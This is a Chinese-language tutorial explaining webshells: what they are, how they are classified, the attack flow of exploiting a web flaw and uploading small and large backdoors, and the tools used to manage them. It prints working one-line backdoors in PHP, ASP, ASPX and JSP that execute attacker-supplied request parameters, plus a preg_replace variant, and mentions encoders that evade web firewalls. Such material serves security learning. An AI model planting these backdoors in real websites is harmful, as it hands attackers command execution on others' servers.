Webshell基础详解

1.什么是Webshell

     webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称作为一种网页木马后门。

    攻击者可以通过这种网页后门获得网站服务器操作权限，烤制网站服务器以进行上传下载文件、查看数据、执行命令等。

2.什么是木马

    全程“特洛伊木马”，之寄宿在计算机里的一种非授权的远程控制程序，它可以在计算机管理员未发觉的情况下我，开放系统授权、泄露用户信息给个记者，是黑客常用的工具之一。

3.webshell的分类

按文件大小分类

1.一句话木马：代码简短，通常只有一行代码，使用方便

2.小马：只包含文件上传功能，体积小

3.大马：体积大，包换很多功能，代码一般会进行加密隐藏

按脚本类型分类

jsp、asp、aspx、php

4.webshell特点

1.wenshell大多都以动态脚本形式出现

2.webshell就是一个asp或php木马后门

3.webshell可以穿越服务器防火墙，攻击者与被控服务器交换数据都是80端口传递

4.webshell一般不会在系统日志中留下记录，只会在web日志中留下数据传递记录

5.webshell攻击流程

1.利用web漏洞获取web权限

2.上传小马

3.上传大马

4.远程调用webshell执行命令

6.常见的一些webshell

php：<?php eval($_GET[pass]);?>

         <?php eval($_POST[pass]);?>

         <?php @$a = $_COOKIE[1];$b =";$c = ";@assert($b.$a);?>

ASP:<%eval request("pass")%>

ASPX:<%@ Page Language="Jscript"%><%eval(Reaquest.Item["pass"])%>

JSP:<%Runtime.getRuntime().exec(request.getParameter("i"));%>

7.webshell基本原理

1.基本原理

1可执行脚本:HTTP数据包($_GET、$_POST、$_COOKIES)

2数据传递

3执行传递的数据

直接执行（eval、system、passthru）

文件包含执行(include、require)

动态函数执行（$a="phpinfo"；$a();）

回调函数（array_map等）

......

2.一句话木马之小马

<?php
function fun()
{return $_POST['a'];}
@preg_replace("/test/e",fun(),"test test test");
?>

8.webshell管理工具

中国菜刀（Chopper）
中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！在非简体中文环境下使用，自动切换到英文界面。UNICODE方式编译，支持多国语言输入显示。
官方网站：http://www.maicaidao.com/

中国蚁剑（AntSword）
中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。使用编/解码器进行流量混淆可绕过WAF，并且有多款实用插件。
因为菜刀也许有后门(偷shell)，不放心可以用蚁剑，蚁剑还可以看源码，功能也比菜刀强些。
项目地址：https://github.com/AntSwordProject/antSword

哥斯拉(Godzilla)
哥斯拉是一款继冰蝎之后又一款于Java开发的加密通信流量的新型Webshell客户端，内置了3种有效载荷以及6种加密器，6种支持脚本后缀，20个内置插件，也是目前在HVV中使用较多的一款工具。
项目地址：https://github.com/BeichenDream/Godzilla